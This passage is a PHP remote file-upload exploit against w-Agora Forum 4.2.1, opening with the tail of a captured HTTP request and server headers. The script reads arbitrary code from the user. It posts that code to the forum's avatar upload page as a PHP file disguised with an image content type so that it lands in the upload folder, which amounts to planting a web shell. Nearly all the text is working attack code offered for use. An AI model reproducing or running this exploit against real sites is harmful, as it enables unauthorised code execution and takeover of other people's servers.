-----------------------------76401208715012 Content-Disposition: form-data; name="submit" Copy file -----------------------------76401208715012-- ] Response Headers: Date[Mon, 30 May 2011 00:58:18 GMT] Server[Apache/2.2.11 (Win32) PHP/5.3.0] X-Powered-By[PHP/5.3.0] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html] */ if(count($argv) == 5) { echo "\n\n"; echo "+---------------------------------------------------------------+\r\n"; echo "| w-Agora Forum 4.2.1 Remote File Upload Exploit |\r\n"; echo "| Treasure Security |\r\n"; echo "| by Treasure Priyamal |\r\n"; echo "| Usage: php exploit.php site.com /path/ user pass |\r\n"; echo "+---------------------------------------------------------------+\r\n"; echo "\n"; echo "Code to write in the file (ie. ) :\r\n\n"; $code = trim(fgets(STDIN)); $socket = @fsockopen($argv[1], 80, $eno, $estr, 30); if(!$socket) { die("Could not connect to ".$argv[1].". Operation aborted."); } $part1 = "POST http://192.168.1.101/w-agora/browse_avatar.php?site=localhost HTTP/1.1\r\n"; $part1 .= "Host: " . $argv[1] . "\r\n"; $part1 .= "User-Agent : Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n"; $part1 .= "Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $part1 .= "Connection: keep-alive\r\n"; $part1 .= "Accept-Language : en-us,en;q=0.5\r\n"; $part1 .= "Referer :localhost/w-agora/browse_avatar.php?site=localhost\r\n"; $part1 .= "Cookie : wa_lang=en\r\n"; $part1 .= "Content-Type : multipart/form-data; boundary=---------------------------14695017222113685839218008876\r\n"; $part2 = "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"site\"\r\n"; $part2 .= "localhost\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"submitted\"\r\n"; $part2 .= "true\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"perpage\"\r\n"; $part2 .= "20\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"first\"\r\n"; $part2 .= "0\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"avatar\"; filename=\"file.php\"\r\n"; $part2 .= "Content-Type: image/gif\r\n"; // this is where the magic happens $part2 .= $code."\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part2 .= "Content-Disposition: form-data; name=\"Submit\"\r\n"; $part2 .= "Copy file\r\n"; $part2 .= "-----------------------------14695017222113685839218008876\r\n"; $part1 .= "Content-Length: " . strlen($part2) . "\r\n\r\n"; $part1 .= $part2; fwrite($socket, $part1); echo "check the upload folder"; } else { echo "\n\n"; echo "+---------------------------------------------------------------+\r\n"; echo "| w-Agora Forum 4.2.1 Remote File Upload Exploit |\r\n"; echo "| Treasure Security |\r\n"; echo "| by Treasure Priyamal |\r\n"; echo "+---------------------------------------------------------------+\r\n"; echo "| Usage: php exploit.php site.com /path/ user pass |\r\n"; echo "+---------------------------------------------------------------+\r\n"; echo "\n\n"; } ?>